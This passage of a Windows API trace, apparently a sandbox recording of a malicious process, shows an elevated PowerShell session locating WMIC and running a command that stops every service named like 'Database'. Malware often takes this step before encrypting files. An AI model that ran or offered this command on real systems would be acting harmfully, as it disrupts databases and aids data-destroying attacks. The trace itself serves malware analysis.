ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.760] SetErrorMode (uMode=0x1) returned 0x1 [0254.760] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.760] SetErrorMode (uMode=0x1) returned 0x1 [0254.760] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.761] SetErrorMode (uMode=0x1) returned 0x1 [0254.761] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.761] SetErrorMode (uMode=0x1) returned 0x1 [0254.761] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.762] SetErrorMode (uMode=0x1) returned 0x1 [0254.762] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.762] SetErrorMode (uMode=0x1) returned 0x1 [0254.762] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.762] SetErrorMode (uMode=0x1) returned 0x1 [0254.763] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.763] SetErrorMode (uMode=0x1) returned 0x1 [0254.763] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.763] SetErrorMode (uMode=0x1) returned 0x1 [0254.763] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.764] SetErrorMode (uMode=0x1) returned 0x1 [0254.764] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.764] SetErrorMode (uMode=0x1) returned 0x1 [0254.764] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.764] SetErrorMode (uMode=0x1) returned 0x1 [0254.765] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.765] SetErrorMode (uMode=0x1) returned 0x1 [0254.765] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.765] SetErrorMode (uMode=0x1) returned 0x1 [0254.765] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.766] SetErrorMode (uMode=0x1) returned 0x1 [0254.766] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.766] SetErrorMode (uMode=0x1) returned 0x1 [0254.766] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.766] SetErrorMode (uMode=0x1) returned 0x1 [0254.767] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.767] SetErrorMode (uMode=0x1) returned 0x1 [0254.767] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.767] SetErrorMode (uMode=0x1) returned 0x1 [0254.767] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.767] SetErrorMode (uMode=0x1) returned 0x1 [0254.768] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.768] SetErrorMode (uMode=0x1) returned 0x1 [0254.768] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.768] SetErrorMode (uMode=0x1) returned 0x1 [0254.768] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.769] SetErrorMode (uMode=0x1) returned 0x1 [0254.769] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0254.769] SetErrorMode (uMode=0x1) returned 0x1 [0254.769] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.769] SetErrorMode (uMode=0x1) returned 0x1 [0254.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0254.770] SetErrorMode (uMode=0x1) returned 0x1 [0254.770] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.770] SetErrorMode (uMode=0x1) returned 0x1 [0254.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0254.771] SetErrorMode (uMode=0x1) returned 0x1 [0254.771] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.771] SetErrorMode (uMode=0x1) returned 0x1 [0254.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0254.771] SetErrorMode (uMode=0x1) returned 0x1 [0254.772] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.772] SetErrorMode (uMode=0x1) returned 0x1 [0254.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0254.772] SetErrorMode (uMode=0x1) returned 0x1 [0254.772] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0254.773] SetErrorMode (uMode=0x1) returned 0x1 [0254.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c86d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0254.773] SetErrorMode (uMode=0x1) returned 0x1 [0254.773] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c86d720 | out: lpFindFileData=0x1c86d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0254.773] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c86d730 | out: lpFindFileData=0x1c86d730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0254.774] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0254.774] SetErrorMode (uMode=0x1) returned 0x1 [0254.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c86d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0254.774] SetErrorMode (uMode=0x1) returned 0x1 [0254.774] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c86da50 | out: lpFileInformation=0x1c86da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0254.774] SetErrorMode (uMode=0x1) returned 0x1 [0254.775] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0254.775] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c86dc38, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c86dc38) returned 0x4550 [0254.776] CoTaskMemFree (pv=0x1b9b1010) [0254.776] GetConsoleWindow () returned 0x5011e [0254.782] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0254.782] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0254.782] CoTaskMemFree (pv=0x2af8c0) [0254.782] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0254.782] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0254.782] CoTaskMemFree (pv=0x2af8c0) [0254.782] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%Database%%'\" call stopservice", pNumArgs=0x1c86dc80 | out: pNumArgs=0x1c86dc80) returned 0x1ee760*="" [0254.782] lstrlenW (lpString="path") returned 4 [0254.782] CoTaskMemAlloc (cb=0xc) returned 0x286df0 [0254.782] RtlMoveMemory (in: Destination=0x286df0, Source=0x1ee7a2, Length=0xa | out: Destination=0x286df0) [0254.783] CoTaskMemFree (pv=0x286df0) [0254.783] lstrlenW (lpString="Win32_Service") returned 13 [0254.783] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0254.783] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0254.783] CoTaskMemFree (pv=0x1b9b1010) [0254.783] lstrlenW (lpString="where") returned 5 [0254.783] CoTaskMemAlloc (cb=0xe) returned 0x286df0 [0254.783] RtlMoveMemory (in: Destination=0x286df0, Source=0x1ee7c8, Length=0xc | out: Destination=0x286df0) [0254.783] CoTaskMemFree (pv=0x286df0) [0254.783] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0254.783] CoTaskMemAlloc (cb=0x34) returned 0x1b9c7170 [0254.783] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x32 | out: Destination=0x1b9c7170) [0254.783] CoTaskMemFree (pv=0x1b9c7170) [0254.783] lstrlenW (lpString="call") returned 4 [0254.783] CoTaskMemAlloc (cb=0xc) returned 0x286df0 [0254.783] RtlMoveMemory (in: Destination=0x286df0, Source=0x1ee806, Length=0xa | out: Destination=0x286df0) [0254.783] CoTaskMemFree (pv=0x286df0) [0254.783] lstrlenW (lpString="stopservice") returned 11 [0254.783] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0254.783] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee810, Length=0x18 | out: Destination=0x1b9b1010) [0254.783] CoTaskMemFree (pv=0x1b9b1010) [0254.783] LocalFree (hMem=0x1ee760) returned 0x0 [0254.784] CoTaskMemAlloc (cb=0x804) returned 0x1b9f0f90 [0254.784] GetConsoleTitleW (in: lpConsoleTitle=0x1b9f0f90, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0254.785] CoTaskMemFree (pv=0x1b9f0f90) [0254.785] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0254.785] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c86dbe0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3064208 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice", lpProcessInformation=0x3064208*(hProcess=0x5e0, hThread=0x5e4, dwProcessId=0x308, dwThreadId=0x6fc)) returned 1 [0254.788] CoTaskMemFree (pv=0x253f20) [0254.789] CloseHandle (hObject=0x5e4) returned 1 [0254.789] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0254.789] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c86dc88, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c86dc88) returned 0x4550 [0254.789] CoTaskMemFree (pv=0x1b9b1010) [0254.789] GetCurrentProcess () returned 0xffffffffffffffff [0254.790] GetCurrentProcess () returned 0xffffffffffffffff [0254.790] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86dd68, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86dd68*=0x5e4) returned 1 [0255.802] CloseHandle (hObject=0x5e4) returned 1 [0255.802] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x1c86ddd8 | out: lpExitCode=0x1c86ddd8*=0x0) returned 1 [0255.803] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0255.804] CloseHandle (hObject=0x5e0) returned 1 [0255.804] SetEvent (hEvent=0x7c4) returned 1 [0255.804] SetEvent (hEvent=0x7b8) returned 1 [0255.805] SetEvent (hEvent=0x7bc) returned 1 [0255.805] SetEvent (hEvent=0x7c0) returned 1 [0255.805] SetEvent (hEvent=0x7d4) returned 1 [0255.805] SetEvent (hEvent=0x7c8) returned 1 [0255.805] SetEvent (hEvent=0x7cc) returned 1 [0255.805] SetEvent (hEvent=0x7d0) returned 1 [0255.805] SetEvent (hEvent=0x7d8) returned 1 [0255.805] CoUninitialize () Thread: id = 230 os_tid = 0x4a0 [0255.843] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0255.845] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0255.846] VirtualQuery (in: lpAddress=0x1c84cea0, lpBuffer=0x1c84dd60, dwLength=0x30 | out: lpBuffer=0x1c84dd60*(BaseAddress=0x1c84c000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0255.863] VirtualQuery (in: lpAddress=0x1c84d150, lpBuffer=0x1c84e010, dwLength=0x30 | out: lpBuffer=0x1c84e010*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0255.873] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0255.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0255.873] CoTaskMemFree (pv=0x2af8c0) [0255.873] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0255.873] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0255.873] CoTaskMemFree (pv=0x2af8c0) [0255.874] CoTaskMemAlloc (cb=0x20e) returned 0x2bd3c0 [0255.874] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bd3c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0255.874] CoTaskMemFree (pv=0x2bd3c0) [0255.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.874] SetErrorMode (uMode=0x1) returned 0x1 [0255.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.875] SetErrorMode (uMode=0x1) returned 0x1 [0255.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.875] SetErrorMode (uMode=0x1) returned 0x1 [0255.875] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.876] SetErrorMode (uMode=0x1) returned 0x1 [0255.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.876] SetErrorMode (uMode=0x1) returned 0x1 [0255.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.876] SetErrorMode (uMode=0x1) returned 0x1 [0255.877] 